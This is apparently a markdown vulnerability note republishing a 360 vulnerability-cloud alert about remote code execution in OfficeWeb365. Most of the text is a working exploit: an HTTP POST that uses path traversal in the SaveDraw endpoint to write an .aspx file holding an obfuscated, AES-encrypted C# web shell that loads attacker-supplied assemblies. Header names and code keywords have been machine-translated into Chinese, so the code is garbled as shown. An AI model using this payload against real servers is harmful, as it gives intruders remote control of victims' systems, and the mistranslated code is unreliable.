OfficeWeb365 远程代码执行漏洞.md at main

OfficeWeb365 远程代码执行漏洞.md

51 lines | UTF-8 | 3 KB

Blame

【消息详情】：360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经上传漏洞云情报平台，平台编号：360LDYLD-2023-00002453，情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经升级漏洞云情报平台，平台编号： 360LDYLD-2023-00002453

# 详细

POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人：xxx
用户代理：Mozilla/5.0（Macintosh；Intel Mac OS X 10_15_7）AppleWebKit/537.36（KHTML，如 Gecko）Chrome/88.0.434.18 Safari/537.36
内容长度：2265
内容类型：application/x-www-form-urlencoded
接受编码：gzip、deflate
连接：关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
    <%@Import 命名空间="System.Reflection" %>
    <脚本运行=“服务器”>
               私有字节[]解密（字节[]数据）
        {
            字符串键=“e45e329feb5d925b”；
            数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
        私有字节[]加密（字节[]数据）
        {
            字符串键=“e45e329feb5d925b”；
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
        }
    </脚本>
        <%
        //byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
                byte[] c=Request.BinaryRead(Request.ContentLength);
          string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
          类型程序集=Type.GetType(asname);
           MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
           对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
           MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
           字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
           object pay=create.Invoke(obj,new object[] { name });
           pay.Equals(this);%>>---